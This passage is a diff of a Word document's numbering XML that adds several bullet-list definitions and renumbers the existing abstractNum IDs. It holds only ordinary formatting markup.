+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="094661A2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="8F148612"/>
@@ -6563,7 +7787,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0C287E4B"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="AF503472"/>
@@ -6676,7 +7900,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0D3F4E83"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="96AA72BA"/>
@@ -6789,7 +8013,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="0EBD1D4C"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="43EAF71E"/>
@@ -6902,7 +8126,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="106D50F5"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F5543EC8"/>
@@ -6988,7 +8212,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="14E374B2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="301860A4"/>
@@ -7101,7 +8325,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="17525BC1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9E768ADA"/>
@@ -7214,7 +8438,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="9" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="18D966B7"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="A52E4FD2"/>
@@ -7327,7 +8551,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="10" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="1BEA09AA"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="ED08CADE"/>
@@ -7440,7 +8664,119 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="11" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="1EB23969"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="3CB42E94"/>
+    <w:lvl w:ilvl="0" w:tplc="C31A60BA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="21C00CB2"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="58CCDEC4"/>
@@ -7553,7 +8889,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="12" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="22484DEB"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="E64EC8F8"/>
@@ -7666,7 +9002,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="13" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="22F012F8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="EFFC1BC8"/>
@@ -7779,7 +9115,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="14" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="25B65DCF"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="415CB1D8"/>
@@ -7865,7 +9201,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="15" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="2F894E92"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="9A58D11C"/>
@@ -7978,7 +9314,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="16" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36E53BA8"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4C14F80E"/>
@@ -8067,7 +9403,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="17" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="380A1925"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="C2D4C25A"/>
@@ -8180,7 +9516,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="18" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="3C3A4E54"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7398E80E"/>
@@ -8293,7 +9629,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="19" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="41BD2C46"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="DFECDCEC"/>
@@ -8406,7 +9742,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="20" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="47AF52BC"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7660E4E0"/>
@@ -8519,7 +9855,119 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="21" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="492E3952"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="563A8370"/>
+    <w:lvl w:ilvl="0" w:tplc="C31A60BA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="527E01AE"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="21702F42"/>
@@ -8632,7 +10080,119 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="22" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="534968C9"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="56B843A4"/>
+    <w:lvl w:ilvl="0" w:tplc="C31A60BA">
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="•"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="26" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="590A220E"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="644AF03E"/>
@@ -8745,7 +10305,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="23" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="27" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="5F366ED7"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="F3E09214"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="28" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="604037E1"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="F5B82106"/>
@@ -8858,7 +10531,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="24" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="29" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="60B1355A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="0C7A267A"/>
@@ -8971,7 +10644,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="25" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="30" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="61401A0B"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="ADFC2B3E"/>
+    <w:lvl w:ilvl="0" w:tplc="04130001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04130003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04130005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04130001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
